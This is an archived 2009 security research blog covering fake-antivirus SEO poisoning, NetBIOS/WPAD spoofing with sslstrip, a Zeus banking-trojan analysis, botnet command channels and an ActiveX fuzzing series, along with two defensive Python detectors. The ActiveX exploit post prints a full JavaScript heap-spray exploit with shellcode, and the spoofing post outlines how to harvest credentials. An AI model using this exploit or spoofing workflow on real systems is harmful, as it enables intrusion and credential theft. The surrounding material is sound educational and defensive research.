Somebody once said..

"If you convince people that the wheel isn't right, they will allow you to re-invent it"

Wednesday, December 30, 2009

Digging deep into BlackHat SEO - Part 2

Picking up from where we left off last time, I decided to dig deep into how the whole fake AV scam was being done. So, I fired up Wireshark as I started to browse the Google search results for Brittany Murphy.

Wireshark Capture of my Google search

After clicking on the poisoned search result, we first land on a page that is just an HTML page with all the junk related to the Google search query. Depending on your internet speed, you may or may not see this page, as you are quickly redirected to the Fake AV scanning page.

Now, this intermediate SEO page is very interesting ! It seems the bad folks are pretty clever. The content that we see on this page is dynamically generated. Here is the actual query -


So, I decided to play around and changed the query to something else, like the more recent news about the terrorist Abdul Mutallab, the Nigerian suicide bomber, and surprise surprise ! …


What is happening is that there is a smart script running behind the scenes that creates dynamic content based on the parameters passed to it. It probably fetches the search-related content from Google in the backend and builds a page like the one above. Then Google’s web crawlers, along with tools like XRumer, do the rest !

There are two links or redirects embedded in this HTML source. The first one appears to go to some Blogger site, but looking at the HTTP request you see a referrer being set for it, so it is most likely a tracker that keeps a log of the hits being made to the page.

The second request appears to go to the same PHP page on the same malicious server, but this time the parameter is different. So the query looks like this -

Notice how the “q” changed to “red”, probably meaning “redirect”, and in response we get a nice -

window.location = "http://mal-url-2/?code=944

Bang ! This is the fake AV page. So, as I said before, you may or may not see all this action happening and may simply land on the Fake AV web page. So the whole flow happens like this -

Flow chart explaining the whole redirect process
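As an added example (not code from the original post), here is a small Python detector that scans captured HTTP transactions for the chain just described: a keyword-stuffed page reached from a search engine, a second request to the same script with q=red, and a window.location hand-off to a different host. The hostnames in the sample capture are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

SEARCH_ENGINES = ("google.", "bing.", "yahoo.")
# matches window.location = "..." (or '...') in a response body
LOCATION_RE = re.compile(r"""window\.location\s*=\s*["']([^"']+)""")


def _split(url):
    """Return (host, path, value of the q= parameter) for a request URL."""
    u = urlsplit(url)
    return u.netloc.lower(), u.path, parse_qs(u.query).get("q", [""])[0]


def _from_search_engine(referer):
    host = urlsplit(referer or "").netloc.lower()
    return any(engine in host for engine in SEARCH_ENGINES)


def find_seo_redirect_chains(transactions):
    """transactions: dicts with 'url', 'referer' and 'body' (response text),
    in capture order. Returns one dict per SEO page whose q=red request was
    answered with a window.location hand-off to another host."""
    by_script = {}
    for t in transactions:
        host, path, q = _split(t["url"])
        by_script.setdefault((host, path), []).append((q, t))

    chains = []
    for (host, path), requests in by_script.items():
        # request 1: the keyword-stuffed page, reached from a search engine
        content = [t for q, t in requests
                   if q and q.lower() != "red" and _from_search_engine(t.get("referer"))]
        # request 2: the same script asked again with q=red
        redirects = [t for q, t in requests if q.lower() == "red"]
        for first in content:
            for second in redirects:
                m = LOCATION_RE.search(second.get("body", ""))
                if not m:
                    continue
                target = m.group(1)
                if urlsplit(target).netloc.lower() == host:
                    continue  # navigation within the same site is not the hand-off
                chains.append({
                    "seo_page": host + path,
                    "search_terms": _split(first["url"])[2],
                    "redirect_target": target,
                })
    return chains


# Constructed sample capture (hostnames are placeholders, not real indicators)
SAMPLE_CAPTURE = [
    {"url": "http://seo-host.invalid/index.php?q=Brittany+Murphy+death",
     "referer": "http://www.google.com/search?q=brittany+murphy+death",
     "body": "<html>...keyword junk... <script src='/index.php?q=red'></script>"},
    {"url": "http://tracker-blog.invalid/hit.gif",
     "referer": "http://seo-host.invalid/index.php?q=Brittany+Murphy+death",
     "body": ""},
    {"url": "http://seo-host.invalid/index.php?q=red",
     "referer": "http://seo-host.invalid/index.php?q=Brittany+Murphy+death",
     "body": 'window.location = "http://fakeav-host.invalid/?code=944";'},
    # benign: a shop whose q=red request only navigates within its own site
    {"url": "http://shop.invalid/search.php?q=red+shoes",
     "referer": "http://www.google.com/search?q=red+shoes",
     "body": "<html>results</html>"},
    {"url": "http://shop.invalid/search.php?q=red",
     "referer": "http://shop.invalid/search.php?q=red+shoes",
     "body": 'window.location = "http://shop.invalid/category/red";'},
]

if __name__ == "__main__":
    for chain in find_seo_redirect_chains(SAMPLE_CAPTURE):
        print(chain)
```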

The Fake AV site contains a bunch of JavaScript files (with funky names like drugndrop.js :) ! ) that are designed to make it look as if a real Antivirus is scanning your PC. Even the filenames shown during the scan are hardcoded in JavaScript arrays :P ! Finally, if you click anywhere on the page, you end up getting a so called “installer” which is a downloader Trojan. That request looks like this -

What I have shown above is just one type of Fake AV campaign. Some of them are more sophisticated, e.g. the names of the JavaScript files are random and different each time the page is accessed, which makes them difficult to block using network based signatures.

All this appears to be part of a kit that is being used by a lot of bad guys, probably sitting in Russia or Ukraine. Also, parameters like “adv” might be affiliate IDs given to the different gangs spreading this Fake AV campaign. The downloaded binaries are Rogue AV programs that display misleading alerts about computer problems in order to convince users to purchase them.

These SEO pages and Fake AV hosting websites keep moving, with new domains being registered every now and then. So, next time you are searching for some “Breaking news”, be careful. Have a happy, safe and malware-free new year ! :)

Thursday, December 24, 2009

Digging deep into BlackHat SEO – Part 1

It has been used before for tragic news and was seen once again when actress Brittany Murphy passed away last weekend. Cybercriminals have been very effectively using SEO techniques to push malware onto the machines of users who are browsing the Internet looking for the latest breaking news.

A simple Google search for “Brittany Murphy death” reveals some interesting search results. After the first two or three legitimate results, there are some mysterious links that at first look perfectly legitimate based on the preview text you see in the results.

Fig1: Google search results for Brittany Murphy

There is no way an average user can figure this out, but when you actually click on one of these links, it takes you to a completely different URL, often through multiple redirects.

This is all done using Search Engine Optimization (SEO) techniques. The bad guys first create a page and dump all the popular sentences surrounding a breaking news item like “Airline crash” or “Michael Jackson death” onto that page. They also inject an iframe into the same page that has one or more redirects to a malicious web page. Then, using special SEO tools like XRumer, they increase their page ranking by spamming their URL all over the internet.

When you click on one such poisoned search result, suddenly, out of nowhere, a Windows pop-up alert appears on your screen -

Fig2: Security Warning pop-up

Ultimately you end up landing on a page that at first looks like an Antivirus scanning your local machine but is in fact a very cleverly designed web page.

Fig3: Windows Vista Look'n'feel AV

So depending on which OS you are running, the malicious webserver shows you an Antivirus program with the corresponding look and feel. The one above has a Vista/Win7 look and feel, whereas if you are running WinXP you get this -

Fig4: Windows XP Look'n'feel AV

If you look closely, it is completely designed to trick a user into believing that an Antivirus is scanning the PC. If you are an average Internet user, you won’t even realize that this is being rendered through Internet Explorer ! That is some clever use of HTML and JavaScript code ;)

At this point, irrespective of where you click, you will be prompted to download and install a setup file which is nothing but a downloader Trojan. It downloads a Rogue Antivirus program which not only has the look and feel of popular AV programs but also has a funky name like “Antivirus 2010” or “PC Protect 2010”. But before you can say clean, it will prompt you for registration, which can cost anywhere from $30 to $80 :P !

This trick of threatening the victim by showing how infected his PC is works out rather well. A lot of not-so-tech-savvy people fall for such tricks and the bad guys seem to be earning a lot. The Rogue AV products keep changing their names and so do the various domains that host these malicious pages. This has been one of the most popular attack vectors for malware distributors in 2009.

In the next part I will show you what goes on behind the scenes in this type of attack.

Stay tuned and Merry Christmas ! :)

Wednesday, December 2, 2009

NetBIOS Spoofing

The other day I came across a post that spoke about an interesting way of using the NetBIOS name service for doing a MiTM attack. The author showed how his tool nbpoison could be used to inject false NetBIOS information on the wire and spoof other hosts.

This is a very interesting form of MiTM as there is no ARP spoofing involved, and that is good, since every Tom, Dick and Harry’s device in the network today detects/blocks ARP poisoning kind of attacks. Also, ARP spoofing is way too noisy and can easily give away the attacker's presence in the network. Not to mention that it's an old-school attack that has been around for quite some time now.

So, I decided to explore this and have some fun using the nbtools and figure out what attacks could be made possible in my lab. I have 3 machines in all in my lab - 2 WinXP hosts and 1 Linux host which acts as the gateway for the Windoze boxes. As the author has mentioned, these attacks are more useful in hotels or conferences where there are internet kiosks with captive portal authentication mechanisms.

Scenario 1: DNS Choking

This attack is useful when, for some reason, the DNS server on a network is not reachable. There could be multiple possibilities - either the uplink of the switch you are connected to is (purposely) physically disconnected, or there is a network/firewall misconfiguration, or the DNS server/service itself is down. Even some captive portals prevent access to any resources before you authenticate. So, if the DNS server is not available, as a last resort, Windoze will fall back to NetBIOS name resolution and this is where we can 0wn the box.

So, as you can see, the webserver on the Linux box was used to host the fake page, which could have been anything from a fake captive portal login to a fake Gmail login page to trick the user into entering his credentials. In the above scenario, I had blocked all connections from the victim's machine using iptables on the gateway (Linux box). FYI, the nbpoison tool can be run on any machine and need not be on the gateway.

Scenario 2: Abusing WPAD Requests

This type of attack is useful when browsers have “Automatically detect settings” enabled in the “LAN Settings” menu. IE and Firefox both have this setting in order to enable network administrators to automatically configure proxy settings. This is made possible using the WPAD (Web Proxy Auto Discovery) protocol, which also uses NetBIOS requests to look for the “wpad.dat” file. This is nothing but a simple plain-text configuration file that tells the browser which proxy to connect to for browsing the internet.

So, here we use the famous “sslstrip” to downgrade HTTPS connections to HTTP and sniff passwords in clear text. Like before, we use the webserver on the Linux box to host the wpad.dat file, which redirects the victim's browser to sslstrip (running on port 8080), and we get to see all the good stuff :) !

The possibilities in this scenario are endless. We could use our own proxy, something like Paros, to completely manipulate the victim's browsing experience. But I will leave all the evil thinking to the reader as an exercise ;)
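Added example, not part of the original post: a Python parser for NetBIOS name-service (NBNS) packets with checks for the kind of answers both scenarios above depend on, i.e. anyone answering the WPAD name over NetBIOS, and answers that disagree with a host inventory (assumed to come from DNS/DHCP records). The sample packets and addresses are constructed.

```python
import struct
from ipaddress import IPv4Address

NB_TYPE = 0x0020        # NetBIOS general name service resource record
QR_RESPONSE = 0x8000    # R (response) bit in the NBNS header flags


def encode_nbns_name(name, suffix):
    """First-level encoding (RFC 1002 4.1): pad to 15 chars, append the
    suffix byte, then split every byte into two nibbles, each + 'A'."""
    raw = name.upper().encode("ascii").ljust(15, b" ") + bytes([suffix])
    return bytes(b for c in raw for b in ((c >> 4) + 0x41, (c & 0x0F) + 0x41))


def decode_nbns_name(pkt, off):
    """Inverse of encode_nbns_name. Returns (name, suffix, next_offset)."""
    if pkt[off] != 0x20 or pkt[off + 33] != 0x00:
        raise ValueError("unsupported NBNS name encoding")
    enc = pkt[off + 1:off + 33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].rstrip(b" ").decode("ascii", "replace"), raw[15], off + 34


def parse_nbns(pkt):
    """Parse header, question and answer sections of one NBNS datagram."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!6H", pkt[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, suffix, off = decode_nbns_name(pkt, off)
        qtype, _qclass = struct.unpack("!HH", pkt[off:off + 4])
        off += 4
        questions.append((name, suffix, qtype))
    for _ in range(an):
        name, suffix, off = decode_nbns_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata, off = pkt[off:off + rdlen], off + rdlen
        addrs = []
        if rtype == NB_TYPE:  # RDATA is a list of NB_FLAGS(2) + NB_ADDRESS(4)
            addrs = [str(IPv4Address(rdata[i + 2:i + 6])) for i in range(0, rdlen, 6)]
        answers.append((name, suffix, addrs))
    return {"id": txid, "response": bool(flags & QR_RESPONSE),
            "questions": questions, "answers": answers}


def check_nbns_response(src_ip, pkt, known_hosts=None):
    """Return alert strings for answers that fit the two scenarios above.
    known_hosts: {NAME: ip} from a DNS/DHCP inventory (assumed to exist)."""
    known_hosts = known_hosts or {}
    msg = parse_nbns(pkt)
    alerts = []
    if not msg["response"]:
        return alerts
    for name, suffix, addrs in msg["answers"]:
        if name == "WPAD":
            # Nobody should answer WPAD over NBNS; a browser that trusts this
            # fetches its proxy configuration (wpad.dat) from the claimed host
            alerts.append(f"{src_ip} answered WPAD over NBNS with {addrs}")
        expected = known_hosts.get(name)
        if expected and expected not in addrs:
            alerts.append(f"{src_ip} answered {name}<{suffix:02x}> with {addrs}, "
                          f"inventory says {expected}")
        elif addrs and src_ip not in addrs:
            # the legitimate owner answers with its own address (multi-homed hosts aside)
            alerts.append(f"{src_ip} answered {name}<{suffix:02x}> for another host {addrs}")
    return alerts


# Constructed samples (addresses are placeholders): positive name-query
# responses from a poisoner at 10.0.0.99, and a plain WPAD query for contrast
_HDR = b"\x12\x34" + b"\x85\x00" + b"\x00\x00\x00\x01\x00\x00\x00\x00"  # 1 answer
_RR_TAIL = b"\x00\x20\x00\x01" + b"\x00\x04\x93\xe0" + b"\x00\x06" + b"\x00\x00"
SAMPLE_WPAD = (_HDR + b"\x20" + encode_nbns_name("WPAD", 0x00) + b"\x00"
               + _RR_TAIL + bytes([10, 0, 0, 99]))
SAMPLE_FILESRV = (_HDR + b"\x20" + encode_nbns_name("FILESRV", 0x20) + b"\x00"
                  + _RR_TAIL + bytes([10, 0, 0, 99]))
SAMPLE_QUERY = (b"\x12\x34" + b"\x01\x10" + b"\x00\x01\x00\x00\x00\x00\x00\x00"
                + b"\x20" + encode_nbns_name("WPAD", 0x00) + b"\x00" + b"\x00\x20\x00\x01")

if __name__ == "__main__":
    for alert in check_nbns_response("10.0.0.99", SAMPLE_WPAD):
        print(alert)
    for alert in check_nbns_response("10.0.0.99", SAMPLE_FILESRV, {"FILESRV": "10.0.0.20"}):
        print(alert)
```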

** DISCLAIMER: This is meant as a pure instructional tutorial. I am not responsible for any damage caused by a script kiddie's stupidity or lack of understanding thereof. No harm in any form was caused to anybody in the making of this tutorial.

Friday, November 20, 2009

Dissecting Zeus Botnet...

Posting after a long time.. I was quite busy with some presentations as well as with my Protocol Fuzzer script, which should be ready soon.

Anyway, the Zeus Botnet has been around for quite some time now and has gained some attention with its Internet banking password stealing campaigns and the Zeus Crimeware Kit ! Recently I received a sample which happened to be one of the Trojans belonging to this family.

“uk.exe”, as it is being distributed in the wild, initially seemed to be something else, as VirusTotal results reported a rather poor detection rate by AV vendors and also different names like Trojan.Meredrop or Bancos.lgi. At the time of this analysis, only 2 of the five major AV companies were able to detect this Trojan, and Microsoft's reports suggested it was a downloader.

But when I started with my usual dynamic analysis, things were a little different. I had no idea that I was dealing with a Zeus Botnet Trojan. This Trojan has rootkit functionality and injects itself into one of the Windows processes to avoid detection. As soon as it is executed, the original process (uk.exe) exits and the Trojan soon becomes part of svchost.exe, as expected. It then connected to “” over HTTP like any typical downloader.

Fig1: Trojan communication

As I was looking at Wireshark trying to find patterns to write an IPS signature, I noticed that everything was encrypted :( A little disappointed, I started digging deeper, looking at the file/registry changes made by the malware to see if I could locate the downloaded stuff on the disk. That too was encrypted, and the file was locked by the trojaned process itself. So, as usual, when nothing works Google does :) .. searching for “” directly landed me on a website where I realized that I was dealing with something more sinister than just a downloader.

After reading an excellent article on the ThreatExpert blog about the Zeus Botnet, I knew that I was dealing with “variant 4” of the Zeus Botnet and that the encrypted communication is nothing but the configuration file of the bot. Luckily I got hold of the Zeus Decryptor tool so I didn't have to re-invent the wheel. The encryption is done using the RC4 algorithm, and the funny part is that the 256-bit key is stored within the Trojan exe when it is built. So for the Decryptor tool to work, it has to run on the same infected machine so that it can extract the key from the memory of the trojaned process.

Fig2: Dumping raw data from Wireshark / Decryptor in action

After dumping the raw data from the HTTP response into a file (zeus.cfg.raw), I ran the decryptor tool to get the clear text data and was shocked to see JS code in it ! When I read more on the Zeus functionality, I was amazed at one of the Trojan's capabilities, which is to intercept & inject HTML code into the browser in real time ! So, I decided to play around more with the Trojan, hoping to see the password stealing process in action. After going through the fairly elaborate JavaScript code, I figured out that it was designed to manipulate the code of banking sites belonging to HSBC, Abbey Santander, Alliance & Leicester and NatWest – all UK based Internet banking sites.

Fig3: The Zeus configuration file

So, I opened the NatWest website and entered some fake details in all the fields and voila ! .. Apart from the encrypted traffic, there was an HTTP request to “” submitting all the captured data in clear text ! There it was – all the credentials nicely packaged along with the “ZCID” (Zeus ID), which was my machine name followed by a random string. I wonder why the malware authors decided to keep this part in clear text; they might as well have used encryption for this too – but hey, it definitely made my life easier since I could now write an IPS signature for it ! :)


Fig4: Stolen credentials being submitted to the attacker

But the ability to inject code and manipulate data in the browser was just amazing ! I mean, who thought of this thing – it just defeated everything - SSL, secured login, everything ! As if that was not enough, it detects when a virtual keyboard is in use and starts taking screenshots, leaving the end user completely helpless !

At this moment there are Zeus kits being sold in the wild for anywhere between $400 and $800, and mind you, these are sophisticated kits with a proper user interface and statistics logging which allow you to completely customize the Trojan to your needs. Some guys are also selling “Zeus as a service”, renting out control of their botnet for a few days ! :o Since each binary of the Trojan generated from the kit is designed to have different code, the criminals can virtually churn out thousands of such Trojans, and that explains the poor detection rate by the AV companies.

Thursday, September 24, 2009

Interesting C&C BotNets

Gone are the days when “Command & Control” botnets were controlled using IRC channels or web servers. These days, attackers have moved to more sophisticated techniques, or rather they are taking advantage of already available public infrastructure to control their army of bots.

One such case is that of a bot using Google Groups for sending out the control commands. Discovered by a researcher at Symantec, this Trojan, upon infecting a machine, connects to a private Google group called “escape2sun” and requests a page. This page contains encrypted commands for the Trojan that typically consist of an index number, a command line to execute and, optionally, a file to download. Now not only can the malware author control the botnet, but he also gets all the additional features of Google Groups such as version control, tracking of group activity, etc. ! Smart stuff, eh ?! Read more about it here.

Another similar publicly available service being exploited by botnet authors is Twitter. Using obfuscated Twitter status messages on an account, the malware author is able to send commands to his Trojans. The Trojan works by reading the RSS feed of a particular Twitter account designated by the botnet author. This appears to be a direct fallout of a PoC that was presented at Defcon 17 regarding a tool called “KreiosC2”. More about this here.

But Twitter is not the only social networking site being targeted by botnet authors; other sites such as Jaiku and Tumblr are also being used. A big advantage of such techniques is that it is difficult for content filtering systems to detect & stop this communication, since it is legitimate traffic to well-known websites. But at the same time, the biggest disadvantage is that these are all public services, so whatever activity the botnet is doing is easily visible to others too !

Friday, September 4, 2009

Strange piece of Malware..

Recently I came across two strange pieces of malware – Win32/Induc.A and Win32/Skytap.A.

Well, you can’t exactly call the first one malware because it does not do the usual malicious stuff like disabling AVs, downloading Trojans, stealing data etc.. But it’s very interesting in the way it spreads. Win32/Induc.A is the first malware of its kind that infects Delphi compilers. For those who don’t know, Delphi is an object-oriented, visual programming environment to develop 32-bit and Microsoft .NET applications for deployment on the Internet, Windows and Linux. So essentially, any Delphi program compiled on a machine infected with this Trojan contains a copy of the Trojan itself embedded inside the program, and that is how it spreads !

Now what’s even more interesting is that this smart little Trojan managed to stay undetected by all the AV/AS vendors for more than a year ! In the process, it infected a lot of Delphi programs, including other malware ! :) Yes, there are variants of Win32/Bancos – a popular password stealing Trojan – infected with Win32/Induc code ! We’re lucky Win32/Induc doesn’t do anything more than infecting the Delphi compiler, otherwise this could have been a whole different story. Now AV vendors claim that this was the very reason for it not getting detected for so long, but nevertheless, at least the malware authors got a taste of their own medicine :P !

The second piece of malware, Win32/Skytap, is again a unique Trojan whose source code was published by a Swiss software developer on his website last month. It affects users of Skype, an application popularly used for making voice over IP (VoIP) calls. As you might have already guessed, this Trojan can tap into Skype function calls and extract and dump audio data to files. Not only that, it also converts the audio conversations to the mp3 format and encrypts them.

Win32/Skytap.A contains two components: SkyDLLInjector.exe and DLLToInject.dll. These components hook various Windows API calls that are used for audio input and output. It is then able to intercept all audio data travelling between the Skype process and the underlying audio device, making Skype's network-level encryption useless ! The extracted audio data is then saved to .mp3 files and can be sent out to a remote website using a backdoor component. I am sure we will soon see variants of this Trojan that adapt to other VoIP/messaging software as well.

Now that’s some interesting stuff I have come across after a long time :) !

Thursday, August 20, 2009

Discovering ActiveX Vulnerabilities -- Part 3 [The Exploit]

So far we have seen how to use Dranzer for discovering vulnerabilities in ActiveX objects. In this third & final part of the series we will look at creating a real world exploit from the vulnerability we discovered while fuzzing last time. This, at times, is a very challenging task. Not all vulnerabilities are that easy to exploit. It requires quite a lot of patience and luck to get things going :) !

Before we begin, I would like to tell you something more about this vulnerability. As shown in the video in part 2, it's evident that this is a case of stack based buffer overflow. We also saw that both EIP & SEH were overwritten. Now, managing to overwrite EIP is like hitting a jackpot in Vegas or striking a gold mine for any hacker :D !!! What it means is that we have full control of the program execution and can make it do the things we want.

Which also brings me to the fundamental question - So what? What's the big deal in getting this control ? In short, why am I reading this tutorial ? ;) Well, the reason is that in real life something like this translates into letting the bad guys get control of your machine. A malicious hacker with not-so-good intentions will serve a JavaScript that exploits this ActiveX control & in turn executes a small shellcode that downloads malware onto your machine without you even noticing it. These are called "Drive-by web attacks" and they often exploit vulnerabilities in browser plugins such as Adobe Flash Player or PDF readers to install malware on innocent users browsing the internet.

And this is exactly what I am going to do here. But first we need to identify which part of our evil.html is actually overwriting EIP and SEH. Once we identify that, our life is much easier. I will show how it was done for my evil.html and then you can apply the same logic to yours or to any other vulnerability you know. My evil.html looks something like this -

Fig 1: My evil.html as generated by dranzer

One way to do this would have been to trace back the code in Olly using breakpoints. But a much simpler and faster way is to alter the code in such a way that we get to see it in Olly itself. If you look closely, all the variables in the properties have a long string of "x" in them, which is why you got "00780078" in EIP (remember, unicode representation?). So, instead of using "x", we replace each variable with a unique string that can be identified when we debug, and save it as evil2.html like this -

Fig 2: Modified evil2.html

Now repeat the same process of executing this in IE as we did in part 2 and have a look at the registers. This time, depending on the characters in EIP, you will know exactly which variable is causing the overflow. You can even modify the number of characters inside each of the variables to narrow down to the last 2 chars that overwrite EIP when the exception occurs. This is a fast and very effective method of identifying which part of the code causes the overflow. The next step is to code the exploit.

Now, a buffer overflow vulnerability can be exploited in 100 different ways - I am going to show only one method of doing it :P ! We will use the famous Heap-spraying technique for coding the exploit. I will not discuss that in detail here, you can google it yourself. This method is more common with web browser vulnerabilities such as this one and involves the use of JavaScript to spray (paint) the heap with the shellcode you want to execute. Once our shellcode is all over the memory, we use the overwritten EIP to "jump" to the heap area and hope to execute our shellcode.

Talking of shellcode, I have used a simple shellcode from the Metasploit Framework here that executes calc.exe. One small catch is that in order for our JavaScript to load this shellcode into memory it has to be in unicode ! Don't worry, for every problem there is already a solution :) You can learn more about converting shellcode to unicode here. So, assuming you have the shellcode ready, we create a block of NOP+shellcode and spray it on the heap by declaring an array in JavaScript. Then we modify our variable (the one which causes the overflow) in such a way that EIP gets overwritten with "0c0c0c0c", and effectively we jump to our NOP+shellcode. The whole exploit should look something like this -

<SCRIPT language="javascript">
shellcode = unescape(
"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<512;i++) memory[i] = block + shellcode;

var krapSlide = unescape("%u0c0c");
while (krapSlide.length<5000)
{krapSlide += krapSlide;}

var junkSlide = unescape("%u0x0x");
while (junkSlide.length<1000)
{junkSlide += junkSlide;}

document.write("<object id=TestObj classid=\"CLSID:{XXXXXX-XXXX-XXXX-XXXX-XXXXXXXXX}\" style=\"width:100;height:100\">");
document.write("<PARAM NAME=\"IServer\" VALUE=\""+junkSlide+"\">");
document.write("<PARAM NAME=\"IFailLink\" VALUE=\""+krapSlide+"\">");
</SCRIPT>

Note that I am using only 2 variables here, which I know are causing the overflow based on the results of my evil2.html debugging. The rest is pretty much standard Heap-spraying code you will find in most ActiveX exploits. Now, save that file as "0wned.html" and execute it in IE. Here is the whole thing in action -

Yay !! You've officially been pwned :) !! In my case I am using IE 7 on WinXP SP3. Normally, in IE 8 or above you would get the "ActiveX content blocked" bar on top and you need to allow the content to run for the exploit to work. Also, notice how the IE window just disappears. This is because in the process of overwriting registers, we destroyed the exception handler (SEH) too ! You can avoid the IE crash by writing your own SEH code, thus not letting the end user know anything ever happened. But I will leave that to you as an exercise.

Hope you make good use of what you've just learned. This is by no means a comprehensive tutorial. I tried to explain everything briefly. The actual process of discovering and exploiting may take days and months of hard work. Just a suggestion to all readers who are learning vulnerability research - "Always follow good principles of vulnerability disclosure. If you happen to discover new vulnerabilities, always try and work with the vendor first to fix them and then disclose the information to others".

Questions/Suggestions/Comments welcome ! :)

Tuesday, August 18, 2009

Credit Cards for sale ??

Ever wondered what malware authors gain by writing malicious code ?? Well, if this question had been asked a decade ago, the answer would be slightly different from what it is today ! The so called "underground" scene was totally different from what it is today. In those days it was for fun or for showing off real hacker skills. Nowadays it's just about earning quick bucks and big bucks !!

Like stealing credit card numbers and bank account information, for instance. Can you believe there are websites that openly sell stolen credit card numbers ?!! The way this works is - malware authors generally write password stealing bots that install a keylogger on the infected machine which records the information entered in your browser. This information is then silently sent out through a backdoor channel to the bad guys who control the bot and gather such information from thousands of infected machines. The information is either traded individually, or they offer control of the bot to other cyber criminals who in turn use the bot to steal more information to sell in the black market.

Fig 1: Credit Card information sale on forum

Researchers claim that up to 400 new credit card numbers appear for sale every day !! That's a big number. The guys who sell these numbers even offer a 24 hour replacement guarantee in case a number is not working, as well as technical support in multiple languages ! I am completely amazed at how openly this is being advertised on the internet. Such sales happen on websites that are generally hosted as blogs or on forums.

Fig 2: Blog offering stolen Credit Card & CVV numbers

Prices of these credit card numbers vary by country, ranging from as low as a few cents to $35 for some European countries. Not only credit card numbers but bank account credentials are also traded online for anywhere from $10 to $1,000, and "full identities"—which include date of birth, address, and social security and telephone numbers—sell for between $1 and $15. This whole thing is a business - a well set up and well paid one !

Fig 3: Banking accounts for sale

It's not that these things haven't been tracked and taken down, but every time a bot network is brought down, a new one comes up. Business is good. Internet criminals operate with de facto immunity. The pool of vulnerable computers to exploit remains massive. Affected customers get refunds from banks and banks get it from their insurance companies. Antivirus researchers keep coming up with signatures to detect the bots, whereas the cyber criminals are always one step ahead in creating new variants ! The targeted financial institutions still treat this crime as an acceptable loss. It's an endless cycle :(

All we can do is be a little more careful when it comes to Internet banking ! BTW.. for those who thought using a virtual keyboard for entering your netbanking username and password was safe - think again ! There is a piece of malicious code called Briz that captures the pixels around the cursor, the very pictures of the characters you are clicking on the virtual keyboard ! Nothing in this cyberworld is secure... EVER !

Wednesday, August 12, 2009

Discovering ActiveX Vulnerabilities -- Part 2 [Fuzzing]

So, continuing from where we left off last time, we will be looking at the Dranzer fuzzing tool in detail in this part. In case you landed here directly and are wondering what this is all about, I suggest you have a look here first.

Dranzer is a well documented tool and I also suggest you have a look at its documentation before starting with this, so that you will be familiar with it in general. It's a very simple yet powerful tool. So, assuming you have read the first part, you should now have a fresh WinXP machine with Dranzer, OllyDbg and a text editor installed, and the "Classid" of the ActiveX control you want to fuzz. A note here: "Classid" is sometimes referred to as the "GUID", so do not get confused. They both mean the same thing.

All right, since Dranzer is a command line tool, fire up your command prompt and go to the Dranzer default directory, which is "C:\Program Files\Dranzer\Dranzer\Release". Create a text file, say "CLSID_to_test.txt", and add your ActiveX classid to that file. It should look something like this - "{EFB46ED3-8FD8-...}". If you have multiple classids to fuzz you can add them one below the other in this file. Save the file.

Step 1: Run Dranzer with the following parameters - "Dranzer.exe -i CLSID_to_test.txt -t". You should get something like this on the screen -

Fig 1: Running Dranzer from command prompt

The "-t" switch basically tells Dranzer to test the "Interfaces, Properties and Methods" of the ActiveX control. In my case all the tests passed, so nothing interesting here. Please note that I have purposely censored the ActiveX control information since the vulnerability has not been patched yet. In case you get a failed test here, you can go directly to step 3. You can also use the "-b" load-in-browser option, but frankly I haven't found it that useful.

Step 2: Next, let's check the ActiveX control's "PropertyBag" (the properties a web page can hand to the control through "param" tags) using the following command - "Dranzer.exe -i CLSID_to_test.txt -p". This is what I got -

Fig 2: Dranzer detecting crash

Looks like we got a crash ! Now Dranzer tries to gather as much information about the crash as possible and prints it on the console. If you find that cumbersome, you can always use the "-o filename.log" switch to save the output to a log file and view it later. Coming back to my crash, Dranzer says it's an "Exception Access Violation". Now as hackers or vulnerability researchers, a memory access violation is the thing you really want to see, trust me ! ;) .. In layman's terms it means the control tried to read or write memory it should not have, typically because the data Dranzer fed it overwrote something the code relied on (a pointer, a return address or an exception handler) when IE parsed the file generated by Dranzer.

